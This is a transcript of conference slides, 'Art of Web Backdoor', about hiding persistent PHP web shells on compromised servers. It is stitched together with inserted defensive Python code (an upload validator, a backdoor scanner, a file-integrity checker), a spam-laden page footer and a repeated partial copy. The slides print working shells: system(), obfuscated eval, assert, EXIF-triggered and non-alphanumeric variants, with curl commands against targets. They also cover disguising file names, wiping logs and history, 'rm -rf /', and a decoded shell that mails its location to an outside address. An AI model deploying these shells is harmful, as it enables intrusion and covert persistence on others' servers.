Art of Web Backdoor 
stealth ways to hide your ass in pwned box 
pichaya@ieee.org 
fb.com/index.htmli 
linkedin.com/in/pich4ya 
Pichaya Morimoto
Legal Warning 
Computer-Related Crime Act B.E. 2550 (2007) 
Section 5 
Whoever unlawfully accesses a computer system that has a specific access-prevention measure 
which is not intended for their own use 
shall be punished with imprisonment not exceeding 6 months or a fine not exceeding 10,000 baht 
Section 7 
Whoever unlawfully accesses computer data that has a specific access-prevention measure 
which is not intended for their own use 
shall be punished with imprisonment not exceeding 2 years or a fine not exceeding 40,000 baht 
Section 9 
Whoever unlawfully damages, destroys, corrects, changes or adds to, in whole or in part, 
computer data belonging to another person 
shall be punished with imprisonment not exceeding 5 years or a fine not exceeding 100,000 baht
Overview 
★ Anatomy of (PHP) Web Hacking 
★ Maintaining Access 
★ Techniques 
★ Covering Tracks 
★ Case Studies 
★ Detect / Clean up
How do we plant a web backdoor? 
High Risk 
Medium Risk 
Low Risk 
OWASP Top Ten 2013 
A1-Injection 
A2-Broken Authentication and Session Management 
A3-Cross-Site Scripting (XSS) 
A4-Insecure Direct Object References 
A5-Security Misconfiguration 
A6-Sensitive Data Exposure 
A7-Missing Function Level Access Control 
A8-Cross-Site Request Forgery (CSRF) 
A9-Using Components with Known Vulnerabilities 
A10-Unvalidated Redirects and Forwards
Public CMS/Plugins PWN 
1. Vulnerability Assessment and Mapping 
★ Vulnerable version ? Vulnerability exists ? 
★ Conditions match ? / Known limitations 
2. Exploitation 
★ Public exploit available? 
2.1 Yes - Just use it 
★ Review & test 
2.2 No - Source code analysis 
★ Patch file (.diff) / $ diff -ENwbur vul-src/ patched-src/ 
★ Issue tracker (SVN/GIT repo.) 
★ Public / private vulnerability discussion 
3. Zero-Day - for l33t h4x0r! 
★ Source code analysis without patch, valuable!
Joomla! - Unauthorised Uploads 
Affected Versions: 2.5.x <= 2.5.13 and 3.x <= 3.1.4 
Fixed Date: 2013-July-31 (2.5.14, 3.1.5) 
Vulnerable files 
1. libraries/joomla/filesystem/file.php 
2. administrator/components/com_media/helpers/media.php 
Scenario 
1. Joomla! <= 2.5.13 
2. User with author privilege 
3. OS = Windows Machine 
or misconfigured Apache + Linux 
Bypassing File Upload Restrictions in Joomla!
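A server-side upload check that closes the routes this scenario depends on: double extensions like cat.jpg.php, a trailing dot or space that Windows strips after the check has passed, and Apache consulting every extension of a multi-extension name. This is an added example for this page, not code from the slides or from Joomla; the allowed and executable extension lists and the magic-byte table are assumptions.

```python
import re

# Constructed policy for this example: what the endpoint accepts and which
# extensions the server would execute if such a file reached the document root.
ALLOWED_EXTS = {"jpg", "jpeg", "png", "gif", "pdf"}
EXECUTABLE_EXTS = {"php", "php3", "php4", "php5", "phtml", "phar", "htaccess", "cgi", "pl"}
MAGIC = {  # leading bytes a file of each allowed type must start with
    "jpg": b"\xff\xd8\xff", "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n", "gif": b"GIF8", "pdf": b"%PDF",
}


def stored_name(name: str) -> str:
    """Reduce the client-supplied name to what the filesystem will really store.

    A NUL byte ends the string for C-based layers, directory components are
    dropped, and Windows silently strips trailing dots and spaces, so a name
    that passes a check as 'shell.php.' is written to disk as 'shell.php'.
    """
    name = name.split("\x00", 1)[0]
    name = name.replace("\\", "/").rsplit("/", 1)[-1]
    return name.rstrip(". ")


def check_name(name: str) -> tuple:
    """Return (ok, reason-or-stored-name) for a proposed upload name."""
    base = stored_name(name)
    if not base or base.startswith("."):
        return False, "empty or dot-file name"  # .htaccess is refused here
    parts = base.lower().split(".")
    if len(parts) < 2:
        return False, "no extension"
    exts = parts[1:]
    # Apache mod_mime consults every extension of a multi-extension name, so
    # cat.jpg.php and cat.php.jpg can both reach the PHP handler when it is
    # mapped with AddHandler: refuse an executable extension anywhere in the name.
    if any(e in EXECUTABLE_EXTS for e in exts):
        return False, "executable extension in name"
    if len(exts) > 1:
        return False, "multiple extensions"
    if exts[0] not in ALLOWED_EXTS:
        return False, "extension not allowed"
    return True, base


def content_matches(data: bytes, ext: str) -> bool:
    """Magic bytes must agree with the extension.  This does not prove the file
    is harmless (EXIF fields can carry anything), so the upload directory must
    also be outside the PHP handler's reach and, for images, the file should be
    re-encoded or stripped of metadata before it is served."""
    return data.startswith(MAGIC.get(ext, b"\x00never"))


def validate_upload(name: str, data: bytes) -> tuple:
    """Full check: name policy first, then content against the accepted extension."""
    ok, info = check_name(name)
    if not ok:
        return False, info
    if not content_matches(data, info.rsplit(".", 1)[1]):
        return False, "content does not match extension"
    return True, info
```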
Known Issues or Limitations
Backdoor is a Feature for Admin!
Also in IPB, SMF, vBulletin
Latest vBulletin 5.0.4 - PHP Module
Case Study - Official Ubuntu Forums 
http://www.ubuntuforums.org/ 
★ Hacked on 14 July 2013, Defaced on 20 July 2013 
★ 1.82 million users’ data leaked 
★ Attacker had full access on Forums app servers 
★ Servers running latest version of vBulletin 
What happened (posted on the Canonical blog) 
● A moderator account was hacked 
● The attacker posted XSS on the forum and sent it to an admin 
● 31 seconds later the admin account was PWNED
IPB - Bad Sanitization 
Invision Power Board <= 3.4.4 
Released on : 2013/05/13 by @johnjean 
Logical Vulnerability + Bad Sanitization 
1. Create a new user using .. 
admin@email.com+[150 spaces]+A 
2. MySQL limitation! 
Strings exceeding 150 characters are truncated 
and the value is trimmed, so an arbitrary user 
ends up with the same email as the admin and can change the admin password!
Other factors 
3rd party components 
★ uploadify, ckeditor, ckfinder, tinymce, openx 
Shared Hosting Security 
★ Exposed Session Data 
★ Improper user privileges 
(OS/Code execution, critical file manipulation) 
★ Vulnerable services (SSH, FTP etc.) 
MITM, insider attack, lack of physical access control etc.
Maintaining Access 
Add arbitrary accounts (*nix shadow, AD etc.) 
Reverse Shell and/or Bind Shell using ... 
★ Binary/Script Backdoor 
1. Bind Port to *nix shell 
2. Send *nix shell back to attacker 
3. Make a relay tunnel 
4. Hidden trigger to spawn shell 
★ Web Backdoor - runs as a less privileged user! 
Connect via HTTP methods & headers (GET/POST etc.)
Simple PHP Backdoor 
<?php 
if(isset($_REQUEST['cmd'])){ 
echo "<pre>"; 
$cmd = ($_REQUEST['cmd']); 
system($cmd); 
echo "</pre>"; 
die(); 
} 
?> 
Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd 
$ curl -d "cmd=cat+/etc/passwd" http://target.com/simple-backdoor.php
Hide your ASS
Passing variables to 
PHP global vars: 
$_GET 
$_POST 
$_COOKIE 
$_REQUEST 
$_SERVER 
['HTTP_CMD'] 
Communication 
$ curl -A- -vvv 127.0.0.1/test1.php -H "Accept_Encoding: @system('uname -a;ps -aux');"
base64_decode() + gzinflate() 
1. Encode (Attacker Client) 
$ php -r "echo base64_encode(gzdeflate('system("id")'));" 
K64sLknN1VDKTFHSBAA= 
2. Send (Attacker Client) 
$ curl -A- -vvv 127.0.0.1/test3.php -d "cmd=K64sLknN1VDKTFHSBAA=" 
3. Decode (PHP Backdoor) 
@eval(gzinflate(base64_decode($_POST["cmd"]))); 
4. Output 
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Code Evaluation besides eval() 
1. assert() 
assert('sys' . 'tem('.$_POST["cmd"].')'); 
$ curl -A- -vvv http://target/evil.php -d "cmd='ls -lha'" 
2. preg_replace() with -e modifier (deprecated in PHP 5.5.0) 
preg_replace('/(.*)/e', base64_decode($_POST["cmd"]), '' ); 
$ curl -A- -vvv http://target/evil.php -d "cmd=c3lzdGVtKCdpZCcp" 
3. And many more, e.g. OS command execution functions; check out this link: 
http://stackoverflow.com/questions/3115559/exploitable-php-functions
Stupid trick, but it works! 
★ GNU license in beginning of a PHP file! 
/* Copyright (C) 1991 Free Software Foundation, Inc. 
This file is part of the GNU C Library. 
… 
*/ <?php ... 
★ PGP Public Key !? 
/* -----BEGIN PGP PUBLIC KEY BLOCK----- 
Version: GnuPG v1.4.10 (GNU/Linux) 
... 
*/ <?php … 
★ Software license PROHIBITS decoding it! 
★ More creative filename! 
○ lndex.php 
○ 1ndex.php 
○ index2.php 
○ wp-manual.php 
○ cat.jpg.php 
○ license.txt 
○ README.md 
○ .bash_profile
PHP: exif_read_data() 
1. Create exif meta-data using exiftool 
$ exiftool 2600.jpg -Software=system 
$ exiftool 2600.jpg -Model=id 
2. Put 2600.jpg along with backdoor 
$A = exif_read_data('2600.jpg'); 
$A['Software']($A['Model']); 
3. Browse to backdoor and boom! 
uid=33(www-data) gid=33(www-data) groups=33(www-data)
.htaccess + any file format 
1. Apache Configuration 
AllowOverride All 
2. .htaccess 
<FilesMatch "2600.jpg"> 
SetHandler application/x-httpd-php 
</FilesMatch> 
3. 2600.jpg 
<?php @system($_POST["cmd"]); ?>
one statement PHP backdoor 
<?@$_POST[0]($_POST[1])?> 
$ curl -A- "http://target/backdoor.php" -d "0=system&1=uname+-a"
Binary Code in PHP Shell
non-alphabet PHP shell 
<?$_="";$_[+""]='';$_="$_".""; 
$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");?> 
<?=${'_'.$_}['_'](${'_'.$_}['__']);?> 
$ curl "http://target/backdoor.php?_=shell_exec&__=uname+-a" 
*** This code contains non-printable characters; it might not work if you copy & paste! ***
Common survivor feature! 
works on various types of OS (win/linux/osx) and ISO ?? 
find writable directory 
read/write file 
merge into every files 
merge into backup db / files / zip 
reverse/bind php shell 
database client 
File management (symlink?) 
av/ids/ips/waf detect 
credential dumper 
os command 
network scanner 
TCP/UDP/HTTP/DNS Amp flood 
SOCKS Proxy for pivoting 
HTTP proxy, IRC connect back 
etc.
Exploit Pack
Free Kiddies Backdoor! 
c99 
r57 
wso 
icfdkshell 
weevely 
ASPsh 
msfpayload 
use at your own risk! 
Caution! 
There are many cases where a backdoor is 
served inside another backdoor *w*)a 
e.g. http://packetstormsecurity.com/files/download/117974/wso2.5.1.zip 
$x10="\x6dai\154";$x0b=$_SERVER["\x53\x45RVE\122_\x4eAM\x45"].$_SERVER["\123\103\x52I\x50\x54_\116\101\115E"]; 
$x0c="\141r\162a\171\040".$x0b;$x0d=array("\143\x61","\x6c\x69","\146\x77\162\151\x74\x65","\100","v\x65\x2e"); 
$x0e=$x0d[2].$x0d[3].$x0d[1].$x0d[4].$x0d[0];$x0f=@$x10($x0e,$x0c,$x0b); 
Decoded: 
mail("fwrite@live.ca","target/backdoor.php","target/backdoor.php");
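A static scanner a defender can run over a web root to pick up the backdoor patterns shown from the "Hide your ASS" slides through the obfuscated dropper above: request data reaching system()/eval(), eval on base64+gzinflate payloads, preg_replace /e, $_POST[0]($_POST[1]) and exif_read_data-style variable functions, a comment block in front of <?php, .htaccess SetHandler rewrites, runs of hex escapes and the FilesMan marker. This is an added example, not code from the slides; the signature list, the report labels and the constructed sample files are assumptions, and the heuristics are deliberately noisy, so review hits by hand.

```python
import os
import re
from collections import Counter

SUPERGLOBAL = r"\$_(?:GET|POST|REQUEST|COOKIE|SERVER|FILES)"
SINK = r"\b(?:system|exec|shell_exec|passthru|popen|proc_open|eval|assert)\b"

# One pattern per technique shown on the slides; the label is the report wording.
SIGNATURES = [
    ("request data reaches a command/eval sink",
     re.compile(SINK + r"\s*\([^;]*?" + SUPERGLOBAL)),
    ("eval/assert on a decoded payload",              # eval(gzinflate(base64_decode(...)))
     re.compile(r"\b(?:eval|assert)\s*\(\s*@?\s*(?:gzinflate|gzuncompress|"
                r"base64_decode|str_rot13|strrev)\s*\(")),
    ("preg_replace with /e modifier",
     re.compile(r"preg_replace\s*\(\s*(['\"])(\W).*?\2\w*e\w*\1")),
    ("array element invoked as a function",          # $_POST[0]($_POST[1]), $A['Software']($A['Model'])
     re.compile(r"\$(?:\w+|\{[^}]*\})\s*\[[^\]]*\]\s*\(")),
    ("request header used as input",                 # $_SERVER['HTTP_CMD']
     re.compile(r"\$_SERVER\s*\[\s*['\"]HTTP_")),
    ("run of hex/octal escapes in a string",          # "\146\x77\162\151..." style dropper
     re.compile(r"(?:\\x[0-9a-fA-F]{2}|\\[0-7]{3}){4,}")),
    (".htaccess maps another file type to the PHP handler",
     re.compile(r"\b(?:SetHandler|AddHandler|AddType)\s+application/x-httpd-php")),
    ("known web shell marker (FilesMan)", re.compile(r"FilesMan")),
]


def looks_obfuscated(text: str) -> bool:
    """PHP whose punctuation outweighs its letters, like the $_[+""]|"" shell."""
    if "<?" not in text:
        return False
    counts = Counter(text)
    letters = sum(n for ch, n in counts.items() if ch.isalpha())
    symbols = sum(counts[ch] for ch in "$_[]()|^+\"'")
    return symbols > letters


def scan_text(text: str) -> list:
    """Return the findings for one file's content (an empty list means clean)."""
    hits = [label for label, rx in SIGNATURES if rx.search(text)]
    if re.search(SINK + r"\s*\(", text) and re.search(SUPERGLOBAL, text):
        hits.append("command/eval sink and request data in the same file")
    if re.match(r"\s*/\*", text) and "<?" in text:  # license/PGP comment before <?php
        hits.append("comment block precedes the PHP open tag")
    if looks_obfuscated(text):
        hits.append("non-alphanumeric obfuscation")
    return hits


def scan_tree(root: str, max_bytes: int = 2_000_000) -> dict:
    """Scan every regular file under root regardless of its name: the slides
    show shells hidden as .jpg, license.txt, README.md and .bash_profile."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            path = os.path.join(dirpath, fn)
            try:
                if os.path.getsize(path) > max_bytes:
                    continue
                with open(path, "rb") as fh:
                    text = fh.read().decode("latin-1")  # never fails on binary
            except OSError:
                continue
            hits = scan_text(text)
            if hits:
                report[path] = hits
    return report


SAMPLES = {  # constructed files; the shell ones are the snippets shown on the slides
    "index.php": "<?php\nrequire 'config.php';\n$q = isset($_GET['q']) ? $_GET['q'] : '';\n"
                 "echo '<h1>' . htmlspecialchars($q) . '</h1>';\n",
    "simple-backdoor.php": "<?php\nif(isset($_REQUEST['cmd'])){\n  echo \"<pre>\";\n"
                           "  $cmd = ($_REQUEST['cmd']);\n  system($cmd);\n  echo \"</pre>\";\n  die();\n}\n?>",
    "test3.php": "<?php @eval(gzinflate(base64_decode($_POST[\"cmd\"]))); ?>",
    "evil.php": "<?php preg_replace('/(.*)/e', base64_decode($_POST[\"cmd\"]), '' ); ?>",
    "backdoor.php": "<?@$_POST[0]($_POST[1])?>",
    "exif.php": "<?php $A = exif_read_data('2600.jpg'); $A['Software']($A['Model']); ?>",
    ".htaccess": "<FilesMatch \"2600.jpg\">\nSetHandler application/x-httpd-php\n</FilesMatch>\n",
    "license.txt": "/* Copyright (C) 1991 Free Software Foundation, Inc.\n"
                   "   This file is part of the GNU C Library. */ <?php @system($_POST[\"cmd\"]); ?>",
    "nonalpha.php": "<?$_=\"\";$_[+\"\"]='';$_=\"$_\".\"\";$_=($_[+\"\"]|\"\").($_[+\"\"]|\"\").($_[+\"\"]^\"\");?>",
    "dropper.php": "<?php $x0d=array(\"\\143\\x61\",\"\\146\\x77\\162\\151\\x74\\x65\"); ?>",
}


def scan_samples() -> dict:
    return {name: scan_text(text) for name, text in SAMPLES.items()}


if __name__ == "__main__":
    import sys
    report = scan_tree(sys.argv[1]) if len(sys.argv) > 1 else scan_samples()
    for path, hits in report.items():
        print(path, "->", "; ".join(hits) or "clean")
```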
Covering Tracks 
★ root? 
★ logs e.g. /var/log/* 
★ history e.g. ~/.bash_history 
★ self-destruction 
★ rm -rf /
Detect / Prevent 
★ Follow secure coding guideline 
★ Security hardening checklists 
★ Critical File Integrity Monitoring 
★ VA / Pentest by certified guys 
★ Patch Management & Patch Auditing 
★ Centralized Log & WAF? 
$ iptables -A OUTPUT -m string --algo bm --string 'FilesMan' -j DROP
MOD_Security ? 
var_dump(in_array('mod_security2', apache_get_modules ())); 
print_r(apache_get_modules());
Clean up 
1. Change/reset passwords 
2. Review log files 
3. Hunting vulnerable apps/backdoors 
4. Backup || Recovery 
$ grep for common dangerous functions 
$ find 
★ newly created files 
★ certain conditions (time/date/permission)
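The hunting steps of this Clean up slide together with the Critical File Integrity Monitoring item under Detect / Prevent, as an added example that is not from the slides: a SHA-256 manifest of the web root diffed against a fresh one, plus the find-style conditions (recent mtime, world-writable, scripts under upload directories, look-alike names such as lndex.php). EXEC_EXTS, CORE_NAMES, UPLOAD_DIRS and the temporary web root built by demo() are constructed for the example.

```python
import hashlib
import os
import shutil
import stat
import tempfile

EXEC_EXTS = (".php", ".phtml", ".phar")                                        # assumed
CORE_NAMES = {"index.php", "config.php", "configuration.php", "wp-config.php"}  # assumed
UPLOAD_DIRS = ("upload", "images", "cache", "tmp")                             # assumed
LOOKALIKE = str.maketrans("l10", "iio")   # lndex.php / 1ndex.php -> index.php


def build_manifest(root: str) -> dict:
    """SHA-256, size, mode and mtime of every regular file under root.
    Store the result off the box (read-only media or another host); an intruder
    with write access to the web root can otherwise just regenerate it."""
    manifest = {}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            path = os.path.join(dirpath, fn)
            st = os.lstat(path)
            if not stat.S_ISREG(st.st_mode):
                continue
            h = hashlib.sha256()
            with open(path, "rb") as fh:
                for chunk in iter(lambda: fh.read(65536), b""):
                    h.update(chunk)
            manifest[os.path.relpath(path, root)] = {
                "sha256": h.hexdigest(), "size": st.st_size,
                "mode": st.st_mode & 0o7777, "mtime": int(st.st_mtime),
            }
    return manifest


def compare_manifests(baseline: dict, current: dict) -> dict:
    """What changed since the baseline: new, deleted, rewritten and re-chmodded files."""
    both = set(baseline) & set(current)
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(p for p in both if baseline[p]["sha256"] != current[p]["sha256"]),
        "mode_changed": sorted(p for p in both if baseline[p]["mode"] != current[p]["mode"]),
    }


def hunt(manifest: dict, since: int) -> dict:
    """The find-style conditions from the slide, usable without a baseline: files
    touched at or after a cut-off, world-writable files, scripts under upload or
    cache paths, and look-alike names next to real core files.  mtime is reset
    trivially with touch, so on Linux also compare ctime (stat -c %Z)."""
    out = {"recent": [], "world_writable": [], "script_in_uploads": [], "lookalike": []}
    for path, meta in manifest.items():
        low = path.lower()
        base = os.path.basename(low)
        if meta["mtime"] >= since:
            out["recent"].append(path)
        if meta["mode"] & stat.S_IWOTH:
            out["world_writable"].append(path)
        if low.endswith(EXEC_EXTS) and any(d in low for d in UPLOAD_DIRS):
            out["script_in_uploads"].append(path)
        if base not in CORE_NAMES and base.translate(LOOKALIKE) in CORE_NAMES:
            out["lookalike"].append(path)
    return {k: sorted(v) for k, v in out.items()}


def _write(path: str, content: str, mode: int = 0o644) -> None:
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w") as fh:
        fh.write(content)
    os.chmod(path, mode)


def demo() -> dict:
    """Constructed scenario: baseline a tiny web root, then simulate an intrusion."""
    root = tempfile.mkdtemp(prefix="webroot-")
    try:
        _write(os.path.join(root, "index.php"), "<?php echo 'hello'; ?>")
        _write(os.path.join(root, "uploads", "cat.jpg"), "JFIF stand-in")
        baseline = build_manifest(root)
        cutoff = max(m["mtime"] for m in baseline.values())
        # intruder: script disguised as an image, look-alike core file,
        # modified core file, and an upload made world-writable
        _write(os.path.join(root, "uploads", "cat.jpg.php"), "<?php // constructed stand-in ?>")
        _write(os.path.join(root, "lndex.php"), "<?php // constructed stand-in ?>")
        _write(os.path.join(root, "index.php"), "<?php echo 'hello'; ?>\n<?php // appended ?>")
        os.chmod(os.path.join(root, "uploads", "cat.jpg"), 0o666)
        current = build_manifest(root)
        return {"diff": compare_manifests(baseline, current), "hunt": hunt(current, cutoff)}
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    import json
    print(json.dumps(demo(), indent=2))
```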
Practical Hacking? 
Capture The Flag 
https://ctftime.org/ 
Online challenges 
http://www.root-me.org/en/Challenges/ 
http://wargame2k10.nuitduhack.com/ 
http://captf.com/practice-ctf/ 
http://www.overthewire.org/wargames/natas/ 
http://www.modsecurity.org/demo/ 
VM Labs 
http://blog.g0tmi1k.com/2011/03/vulnerable-by-design.html 
https://pentesterlab.com/exercises/ 
http://vulnhub.com/ 
Thank you!

 
Hand gesture recognition PROJECT PPT.pptx
Hand gesture recognition PROJECT PPT.pptxHand gesture recognition PROJECT PPT.pptx
Hand gesture recognition PROJECT PPT.pptxbodapatigopi8531
 
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...kellynguyen01
 
Unveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time ApplicationsUnveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time ApplicationsAlberto González Trastoy
 

Recently uploaded (20)

The Ultimate Test Automation Guide_ Best Practices and Tips.pdf
The Ultimate Test Automation Guide_ Best Practices and Tips.pdfThe Ultimate Test Automation Guide_ Best Practices and Tips.pdf
The Ultimate Test Automation Guide_ Best Practices and Tips.pdf
 
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
 
A Secure and Reliable Document Management System is Essential.docx
A Secure and Reliable Document Management System is Essential.docxA Secure and Reliable Document Management System is Essential.docx
A Secure and Reliable Document Management System is Essential.docx
 
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
 
CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online ☂️
CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online  ☂️CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online  ☂️
CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online ☂️
 
5 Signs You Need a Fashion PLM Software.pdf
5 Signs You Need a Fashion PLM Software.pdf5 Signs You Need a Fashion PLM Software.pdf
5 Signs You Need a Fashion PLM Software.pdf
 
HR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.comHR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.com
 
Optimizing AI for immediate response in Smart CCTV
Optimizing AI for immediate response in Smart CCTVOptimizing AI for immediate response in Smart CCTV
Optimizing AI for immediate response in Smart CCTV
 
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...
 
CALL ON ➥8923113531 🔝Call Girls Badshah Nagar Lucknow best Female service
CALL ON ➥8923113531 🔝Call Girls Badshah Nagar Lucknow best Female serviceCALL ON ➥8923113531 🔝Call Girls Badshah Nagar Lucknow best Female service
CALL ON ➥8923113531 🔝Call Girls Badshah Nagar Lucknow best Female service
 
How To Use Server-Side Rendering with Nuxt.js
How To Use Server-Side Rendering with Nuxt.jsHow To Use Server-Side Rendering with Nuxt.js
How To Use Server-Side Rendering with Nuxt.js
 
SyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AI
SyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AISyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AI
SyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AI
 
Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...
Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...
Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...
 
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
 
Reassessing the Bedrock of Clinical Function Models: An Examination of Large ...
Reassessing the Bedrock of Clinical Function Models: An Examination of Large ...Reassessing the Bedrock of Clinical Function Models: An Examination of Large ...
Reassessing the Bedrock of Clinical Function Models: An Examination of Large ...
 
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
 
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
 
Hand gesture recognition PROJECT PPT.pptx
Hand gesture recognition PROJECT PPT.pptxHand gesture recognition PROJECT PPT.pptx
Hand gesture recognition PROJECT PPT.pptx
 
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
 
Unveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time ApplicationsUnveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
 

Art of Web Backdoor - Pichaya Morimoto

  • 1. Art of Web Backdoor stealth ways to hide your ass in pwned box pichaya@ieee.org fb.com/index.htmli linkedin.com/in/pich4ya Pichaya Morimoto
  • 2. Legal Warning Computer Crime Act B.E. 2550 (2007). Section 5: Anyone who unlawfully accesses a computer system that has a specific access-control measure not intended for their use faces imprisonment not exceeding 6 months or a fine not exceeding 10,000 baht. Section 7: Anyone who unlawfully accesses computer data that has a specific access-control measure not intended for their use faces imprisonment not exceeding 2 years or a fine not exceeding 40,000 baht. Section 9: Anyone who unlawfully damages, destroys, corrects, alters or adds to, in whole or in part, the computer data of another person faces imprisonment not exceeding 5 years or a fine not exceeding 100,000 baht.
  • 3. Overview ★ Anatomy of (PHP) Web Hacking ★ Maintaining Access ★ Techniques ★ Covering Tracks ★ Case Studies ★ Detect / Clean up
  • 4. How we put web backdoor? High Risk Medium Risk Low Risk OWASP Top Ten 2013 A1-Injection A2-Broken Authentication and Session Management A3-Cross-Site Scripting (XSS) A4-Insecure Direct Object References A5-Security Misconfiguration A6-Sensitive Data Exposure A7-Missing Function Level Access Control A8-Cross-Site Request Forgery (CSRF) A9-Using Components with Known Vulnerabilities A10-Unvalidated Redirects and Forwards
  • 5. Public CMS/Plugins PWN 1. Vulnerability Assessment and Mapping ★ Vulnerable version ? Vulnerability exists ? ★ Conditions match ? / Known limitations 2. Exploitation ★ Public exploit available? 2.1 Yes - Just use it ★ Review & test 2.2 No - Source code analysis ★ Patch file (.diff) / $ diff -ENwbur vul-src/ patched-src/ ★ Issue tracker (SVN/GIT repo.) ★ Public / private vulnerability discussion 3. Zero-Day - for l33t h4x0r! ★ Source code analysis without patch, valuable!
  • 6. Joomla! - Unauthorised Uploads
    Affected Versions: 2.5.x <= 2.5.13 and 3.x <= 3.1.4
    Fixed Date: 2013-July-31 (2.5.14, 3.1.5)
    Vulnerable files
    1. libraries/joomla/filesystem/file.php
    2. administrator/components/com_media/helpers/media.php
    Scenario
    1. Joomla! <= 2.5.13
    2. User with author privilege
    3. OS = Windows machine or misconfigured Apache + Linux
    Bypassing File Upload Restrictions in Joomla!
  • 7. Known Issues or Limitations
  • 8. Backdoor is a Feature for Admin!
  • 9. Also in IPB, SMF, vBulletin
  • 10. Latest vBulletin 5.0.4 - PHP Module
  • 11. Case Study - Official Ubuntu Forums http://www.ubuntuforums.org/ ★ Hacked on 14 July 2013, defaced on 20 July 2013 ★ 1.82 million users' data leaked ★ Attacker had full access to the Forums app servers ★ Servers were running the latest version of vBulletin. What happened (posted on the Canonical blog): ● A moderator account was hacked ● The attacker posted XSS to the forum and sent it to an admin ● 31 seconds later the admin account was PWNED
  • 12. IPB - Bad Sanitization Invision Power Board <= 3.4.4 Released on: 2013/05/13 by @johnjean Logical vulnerability + bad sanitization 1. Create a new user using admin@email.com+[150 spaces]+A 2. MySQL limitation! Strings exceeding 150 characters are truncated and the value is trimmed, so an arbitrary user ends up with the same email as the admin and can change the admin password!
  • 13. Other factors 3rd party components ★ uploadify, ckeditor, ckfinder, tinymce, openx Shared Hosting Security ★ Exposed Session Data ★ Improper user privileges (OS/Code execution, critical file manipulation) ★ Vulnerable services (SSH, FTP etc.) MITM, Insider attack, lack of physical access control etc.
  • 14. Maintaining Access Add arbitrary accounts (*nix shadow, AD etc.) Reverse Shell and/or Bind Shell using ... ★ Binary/Script Backdoor 1. Bind Port to *nix shell 2. Send *nix shell back to attacker 3. Make a relay tunnel 4. Hidden trigger to spawn shell ★ Web Backdoor - Use less privileged! Connect via HTTP Methods & Headers (GET/POST etc.)
  • 15. Simple PHP Backdoor
    <?php
    if(isset($_REQUEST['cmd'])){
      echo "<pre>";
      $cmd = ($_REQUEST['cmd']);
      system($cmd);
      echo "</pre>";
      die();
    }
    ?>
